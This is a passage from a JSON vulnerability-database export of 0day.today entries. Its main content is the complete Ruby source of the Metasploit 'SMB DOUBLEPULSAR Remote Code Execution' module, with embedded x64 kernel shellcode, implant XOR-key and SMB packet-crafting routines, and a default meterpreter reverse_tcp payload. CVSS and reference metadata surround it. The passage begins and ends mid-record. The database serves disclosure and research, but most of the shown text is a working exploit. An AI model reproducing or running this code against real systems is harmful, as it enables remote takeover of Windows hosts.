\\\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" \\\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" \\\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" \\\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-10-20] #"}, "lastseen": "2021-10-20T08:16:37", "differentElements": ["sourceData"], "edition": 49}, {"bulletin": {"id": "1337DAY-ID-33895", "vendorId": null, "hash": "4d12fd8c3d043b07a63f456461a24bf5", "type": "zdt", "bulletinFamily": "exploit", "title": "SMB DOUBLEPULSAR Remote Code Execution Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as 
popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2020-02-04T00:00:00", "modified": "2020-02-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33895", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0147", "CVE-2017-0148", "CVE-2017-0144", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-10-20T22:22:29", "history": [], "viewCount": 112, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:43970", "EDB-ID:41891", "EDB-ID:47456"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-27802", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-29702", "1337DAY-ID-27786"]}, {"type": 
"rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:146236"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:ILITIES/MSFT-CVE-2017-0146/"]}, {"type": "seebug", "idList": ["SSV:92964", "SSV:92952"]}, {"type": "nessus", "idList": ["700059.PRM", "700099.PRM", "MS17-010.NASL", "SMB_NT_MS17-010.NASL"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0148", "CVE-2017-0143", "CVE-2017-0147", "CVE-2017-0145", "CVE-2017-0144", "CVE-2017-0146"]}, {"type": "symantec", "idList": ["SMNTC-96706", "SMNTC-96705", "SMNTC-96703", "SMNTC-96704", "SMNTC-96707", "SMNTC-96709"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", 
"TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "threatpost", "idList": ["THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41"]}, {"type": "mmpc", "idList": ["MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2", "QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0143", "MS:CVE-2017-0144", "MS:CVE-2017-0145"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:64F70C2A6C3961CA44A77286E5B810CD"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-10-20T22:22:29", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-10-20T22:22:29", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33895", "sourceData": "##\r\n# This 
module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n include Msf::Module::Deprecated\r\n\r\n moved_from 'exploit/windows/smb/doublepulsar_rce'\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'SMB DOUBLEPULSAR Remote Code Execution',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14', # Shadow Brokers leak\r\n 'License' => 
MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload (x64)',\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n }\r\n ],\r\n ['Neutralize implant',\r\n 'DefaultOptions' => {\r\n 'PAYLOAD' => nil # XXX: \"Unset\" generic payload\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_OS_DOWN],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }.freeze\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }.freeze\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? 
ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack1('V')\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n print_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n print_warning(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n print_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n print_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to 
proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload (x64)'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n 
simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n 
pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack('S<')\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" \\\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" \\\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" \\\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" \\\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" \\\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" \\\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" \\\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" \\\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" \\\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" \\\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" \\\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" \\\r\n 
\"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" \\\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" \\\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" \\\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" \\\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" \\\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" \\\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" \\\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" \\\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" \\\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" \\\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" \\\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" \\\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" \\\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" \\\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" \\\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" \\\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" \\\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" \\\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" \\\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" \\\r\n 
\"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" \\\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" \\\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" \\\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" \\\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" \\\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" \\\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" \\\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" \\\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" \\\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" \\\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" \\\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" \\\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" \\\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" \\\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" \\\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-10-21] #"}, "lastseen": "2021-10-20T22:22:29", "differentElements": ["sourceData"], "edition": 50}, {"bulletin": {"id": "1337DAY-ID-33895", "vendorId": null, "hash": "01b85a431b5d2e8d0c6915c27bd89d27", "type": "zdt", "bulletinFamily": "exploit", "title": "SMB DOUBLEPULSAR Remote Code Execution Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as 
popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2020-02-04T00:00:00", "modified": "2020-02-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33895", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0144", "CVE-2017-0143", "CVE-2017-0146", "CVE-2017-0147", "CVE-2017-0145", "CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-10-21T22:27:03", "history": [], 